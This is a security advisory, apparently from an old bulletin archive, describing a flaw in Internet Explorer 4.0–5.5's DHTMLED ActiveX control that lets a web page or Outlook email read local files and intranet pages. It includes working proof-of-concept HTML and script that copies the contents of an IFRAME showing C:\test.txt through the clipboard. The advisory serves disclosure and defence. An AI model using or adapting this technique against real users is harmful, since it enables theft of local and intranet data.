COMMAND

    IE

SYSTEMS AFFECTED

    IE 5.5, 5.01

PROBLEM

    Following is based on Georgi Guninski security advisory.   Systems
    affected are IE 5.5, 5.01 (Win98) and it was confirmed to work  on
    IE 5.0 (5.00.2314.1003) on  Win95b and on IE  4.0 (4.72.3612.1713)
    also on Win95b - probably  other versions, but they have  not been
    tested.  Glen  Morgon confirmed it  on IE 5.0  (5.00.2919.6307) on
    NT4.0 (4.00.1381).

    Internet Explorer 5.5 and 5.01 under Windows 98 (suppose all other
    versions are  also vulnerable)  allow reading  local and  from any
    host text and parsed html files.   A danger is reading parsed  web
    pages  from  intranet  web  servers  behind  a  firewall.   It  is
    exploitable from HTML email message  - Outlook.  This is  achieved
    with the DHTMLED ActiveX control.

    The problem is the DHTMLED (DHTML Edit Control Safe for  Scripting
    for IE5), which is used for basic HTML editing.  It allows opening
    a page with an IFRAME but  have problems with DOM protection.   It
    is possible to select  the content of the  IFRAME (which may be  a
    document residing anywhere, including  local disk), copying it  to
    the clipboard and then reading it from the clipboard.  Sounds like
    a DHTMLED in  combination with IFRAME  may lead to  more dangerous
    security risks.

    The code is:

    ------dh2.html--------------------------------
    <SCRIPT>
    alert("This page reads C:\\TEST.TXT\nYou may need to create it.");
    function f1()
    {
    dh.DOM.all.I1.focus();
    dh.DOM.all.I1.document.execCommand("selectall");
    dh.DOM.all.I1.document.execCommand("copy");
    r=document.all.S1.createTextRange();
    r.execCommand("paste");
    alert("Here is your file: "+S1.value);
    }

    function loadit()
    {
    dh.loadURL("http://www.nat.bg/~joro/ifr2.html");
    //                 ^^^^^^^^^^^^^^ You may need to edit this
    setTimeout("f1()",5000);
    }
    setTimeout("loadit();",1000);
    </SCRIPT>
    ---------------------------------------------------
    ---------ifr2.html---------------------------------
    <HTML>
    <IFRAME SRC="file://c:/test.txt" ID="I1" name="I1">
    </IFRAME>
    </HTML>

    Demonstration is available at:

        http://www.nat.bg/~joro/dh2.html

SOLUTION

    Disable  Active  Scripting  or  Disable  Run  ActiveX controls and
    plug-ins (probably other workarounds).